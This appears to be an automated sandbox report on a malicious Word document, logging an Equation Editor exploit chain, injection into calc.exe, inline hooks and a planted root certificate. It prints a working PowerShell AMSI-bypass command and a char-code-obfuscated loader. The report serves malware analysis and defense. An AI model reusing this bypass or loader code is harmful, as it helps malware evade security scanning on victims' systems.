          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0%D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k.....%D.............................}..v....h&D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0-D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k.....-D.............................}..v....h.D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....05D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k.....5D.............................}..v....h6D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0=D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k.....=D.............................}..v....h>D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0ED.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k.....ED.............................}..v....hFD.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0MD.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k.....MD.............................}..v....hND.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'..................k.....m..............................}..v....0UD.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............i..k.....UD.............................}..v....hVD.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3..................k.....m..............................}..v....0]D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............i..k.....]D.............................}..v....h^D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?..................k.....m..............................}..v....0eD.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?...............i..k.....eD.............................}..v....hfD.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K..................k.....m..............................}..v....0mD.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............i..k.....mD.............................}..v....hnD.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W..................k.....m..............................}..v....0uD.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W...............i..k.....uD.............................}..v....hvD.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c..................k.....m..............................}..v....0}D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c...............i..k.....}D.............................}..v....h~D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o..................k.....m..............................}..v....0.D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o...............i..k......D.............................}..v....h.D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{..................k.....m..............................}..v....0.D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{...............i..k......D.............................}..v....h.D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v....0.D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k......D.............................}..v....h.D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.....m..............................}..v......D.....0.......................r.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................i..k....p.D.............................}..v......D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#..................k.....m..............................}..v......D.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............i..k....@.D.............................}..v......D.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../..................k.....m..............................}..v......E.....0.......................r.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............i..k......E.............................}..v....H.E.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;....... ..........k.....m..............................}..v......E.....0................i..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............i..k......E.............................}..v......E.....0...............hj..............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O..................k.... ...............................}..v....pIW.....0.......................j.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O...............Y..k....(JW.............................}..v.....JW.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.5.7.............}..v.....NW.....0.......................$.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[...............Y..k....pOW.............................}..v.....OW.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g..................k.... ...............................}..v.....VW.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g...............Y..k....pWW.............................}..v.....WW.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s..................k.... ...............................}..v.....^W.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s...............Y..k....p_W.............................}..v....._W.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v.....fW.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....pgW.............................}..v.....gW.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v.....nW.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....poW.............................}..v.....oW.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v.....vW.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....pwW.............................}..v.....wW.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v.....~W.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....p.W.............................}..v......W.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v......W.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....p.W.............................}..v......W.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v......W.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....p.W.............................}..v......W.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v......W.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....p.W.............................}..v......W.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v......W.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....p.W.............................}..v......W.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v......W.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....p.W.............................}..v......W.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v......W.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....p.W.............................}..v......W.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v......W.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....p.W.............................}..v......W.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....P.W.....0.......................|.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....................................}..v......W.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....P.W.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k......W.............................}..v......W.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .x.c.e.p.t.i.o.n...........................}..v.... .W.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k......W.............................}..v....X.W.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'..................k.... ...............................}..v......W.....0.......................`.......................Jump to behavior
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C cscript %tmp%\Client.vbs A C
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$91534784575270519153478457527051915347845752705191534784575270519153478457527051=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\calc.exe {path}
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\WINDOWS\syswow64\calc.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C cscript %tmp%\Client.vbs A CJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript C:\Users\user\AppData\Local\Temp\Client.vbs A CJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\calc.exe {path}Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\WINDOWS\syswow64\calc.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::CrEaTe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDDA1.tmpJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_00B8719A CoCreateInstance,GetStdHandle,13_2_00B8719A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: RFQ-CIF DT22.docStatic file information: File size 2186640 > 1048576
          Source: Binary string: wntdll.pdb source: calc.exe, calc.exe, 0000000B.00000003.488729930.00000000007C0000.00000004.00000001.sdmp, calc.exe, 0000000B.00000002.542590602.0000000000CB0000.00000040.00000001.sdmp, calc.exe, 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, calc.exe, 0000000B.00000003.487607468.0000000000660000.00000004.00000001.sdmp, cscript.exe
          Source: Binary string: cscript.pdbN source: calc.exe, 0000000B.00000002.541582055.0000000000584000.00000004.00000020.sdmp, calc.exe, 0000000B.00000002.541504670.0000000000430000.00000040.00020000.sdmp
          Source: Binary string: cscript.pdb source: calc.exe, 0000000B.00000002.541582055.0000000000584000.00000004.00000020.sdmp, calc.exe, 0000000B.00000002.541504670.0000000000430000.00000040.00020000.sdmp, cscript.exe
          Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.drInitial sample: OLE indicators vbamacros = False

          Data Obfuscation:

          barindex
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041E99D push fs; ret 11_2_0041E99F
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00416BC6 push esp; iretd 11_2_00416BDB
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041EB8A push dword ptr [AD487281h]; ret 11_2_0041EE6B
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041D4B5 push eax; ret 11_2_0041D508
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041D56C push eax; ret 11_2_0041D572
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041D502 push eax; ret 11_2_0041D508
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041D50B push eax; ret 11_2_0041D572
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041BE96 push ss; retf 11_2_0041BE99
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00417740 push FFFFFFDAh; ret 11_2_00417742
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041EFC8 push esp; ret 11_2_0041F011
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B4DFA1 push ecx; ret 11_2_00B4DFB4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_00B8262B push ecx; ret 13_2_00B8263E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022DDFA1 push ecx; ret 13_2_022DDFB4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0008E99D push fs; ret 13_2_0008E99F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0008EB8A push dword ptr [AD487281h]; ret 13_2_0008EE6B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_00086BC6 push esp; iretd 13_2_00086BDB
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0008DC2C push ecx; ret 13_2_0008DC2D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0008D4B5 push eax; ret 13_2_0008D508
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0008D50B push eax; ret 13_2_0008D572
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0008D502 push eax; ret 13_2_0008D508
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0008D56C push eax; ret 13_2_0008D572
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0008BE96 push ss; retf 13_2_0008BE99
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_00087740 push FFFFFFDAh; ret 13_2_00087742
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0008EFC8 push esp; ret 13_2_0008F011
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_00B86E5C LoadLibraryA,GetProcAddress,GetLastError,13_2_00B86E5C

          Persistence and Installation Behavior:

          barindex
          Creates processes via WMIShow sources
          Source: C:\Windows\SysWOW64\cscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::CrEaTe

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEB
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
